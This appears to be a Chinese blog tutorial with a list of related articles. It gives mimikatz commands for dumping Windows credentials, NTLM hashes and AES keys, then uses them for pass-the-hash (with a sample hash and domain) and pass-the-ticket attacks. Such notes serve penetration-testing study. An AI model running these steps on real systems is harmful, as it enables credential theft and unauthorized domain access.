mimikatz使用哈希 ntlm传递 票据传递
(1)管理员运行
(2)必须输入
privilege::debug
(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码
sekurlsa::logonpasswords
(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043
mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
(5) aes-256密钥
使用 mimikatz抓取密钥
sekurlsa::ekeys
获取到 aes-25后
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”
需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。
票据传递
privilege::debug
sekurlsa::tickets /export
执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等
使用以下命令 清楚 内存中的票据
kerberos::purge
将票据文件注入内存
kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”
“文件名”
在当前终端 退出 mimikatz 然后就可以列出目标目录啦。
除了mimikatz工具 还可以用 kekeo传递票据。
mimikatz使用哈希 ntlm传递 票据传递相关推荐
- 【内网学习笔记】21、哈希传递与票据传递
1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...
- 【内网安全】域横向PTHPTKPTT哈希票据传递
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...
- 内网域横向PTHPTKPTT哈希票据传递
内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...
- 哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
Mimikatz在本文章中会用到的命令 privilege::debug #提升权限 sekurlsa::logonpasswords #抓取密码信息 sekurlsa::msv #抓取LM.NTLM ...
- 【内网渗透】域横向PTHPTKPTT哈希票据传递
目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...
- 内网横向移动|PTT票据传递横向|Mimikatz Kerberos
票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NT ...
- 内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)
目录 PTH(pass-the-hash)传递哈希 Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) 传递票据
- 内网渗透之PPT票据传递攻击(Pass the Ticket)
文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...
- 域渗透PTT票据传递攻击(Pass the Ticket)
文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源 ...
最新文章
- 逐步创建Data Guard
- java juel表达式_activiti 自定义函数解析juel表达式
- 接口自动化(四)--数据依赖的处理
- 摩尔投票法(力扣- -229. 求众数 II)
- python笔记之文件的基本操作和os模块
- iphone照片删掉又出现_iPhone手机相册无法加锁应该怎么办?
- CF1016F:Road Projects(树形dp)
- python中ans的用法_python cx_Oracle基础使用方法
- 论文笔记:STD2P: RGBD Semantic Segmentation Using Spatio-Temporal Data-Driven Pooling
- mac文件丢失,苹果电脑有没有好用的恢复软件?
- 嵌套DIV中的onClick事件在嵌套容器中的连环作用
- 交叉火力dsp手机调音软件_可一键调音的车载DSP功放应用
- Spyder安装教程只需三步_保姆式无基础 2020/11/7最新版
- 爬虫 --- 08. 全站爬取(CrawlSpider), 分布式, 增量式爬虫
- hive3.1.2 flink写数据到hive报错Reading or writing ACID table.....
- android 页面回滚焦点位置 解决方案
- 水箱建模最小二乘法_高位消防水箱考点汇总及历年真题!
- 在线电子书阅读微信小程序 毕业设计(4)图书详细页-图书目录
- python之函数len()
- OpenStack计算节点nove启动报错